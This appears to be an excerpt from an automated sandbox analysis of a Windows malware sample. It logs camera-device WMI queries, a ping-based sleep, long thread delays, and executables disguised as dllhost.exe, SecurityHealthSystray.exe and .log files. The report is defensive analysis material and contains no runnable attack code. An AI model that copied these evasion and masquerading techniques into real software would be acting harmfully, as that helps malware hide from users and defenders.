Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Memory allocated: 1240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Memory allocated: 1ADC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Memory allocated: 2D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Memory allocated: 1ADC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Memory allocated: 1870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Memory allocated: 1EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Memory allocated: 11C0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Memory allocated: 1AF80000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Memory allocated: 1710000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Memory allocated: 1B2F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Memory allocated: F20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Memory allocated: 1ACA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Memory allocated: 1450000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Memory allocated: 1B150000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Memory allocated: AD0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Memory allocated: 1A490000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Memory allocated: D20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Memory allocated: 1A890000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Memory allocated: A50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Memory allocated: 1A430000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Memory allocated: 15D0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Memory allocated: 1AFB0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Memory allocated: CC0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Memory allocated: 1A820000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Memory allocated: DE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Memory allocated: 1ABD0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Memory allocated: 18A0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Memory allocated: 1B380000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 600000
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 599870
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 599515
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 598875
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 598640
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 598328
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 598156
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 597937
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 597701
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 597119
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 596906
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 596734
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 596421
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 596183
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595982
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595812
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 300000
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595625
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595466
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595358
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595247
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595137
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 594937
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 594375
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 594216
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 594093
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593984
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593826
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593699
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593577
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593467
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593359
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593249
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593140
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593031
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592900
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592791
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592687
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592578
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592467
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592353
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592183
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591734
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591556
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591452
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591343
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591234
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591121
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591015
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590903
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590796
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590687
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590578
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590457
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590341
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590232
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590125
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590015
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 589899
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 589796
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 589687
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 589572
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 589437
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588944
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588827
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588715
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588609
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588499
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588390
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588271
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588105
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 587979
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 587874
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2764	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2238
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2169
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2645
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2545
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2334
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Window / User API: threadDelayed 9211
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Window / User API: threadDelayed 371

Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RrNkXoHQ.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\greisgmx.log	Jump to dropped file
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uJayprRQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IETDQDzo.log	Jump to dropped file
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cOkJseIw.log	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YOJaOqPH.log	Jump to dropped file
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kaHiFPLi.log	Jump to dropped file
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pnhXwyoY.log	Jump to dropped file

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe TID: 5220	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe TID: 6948	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
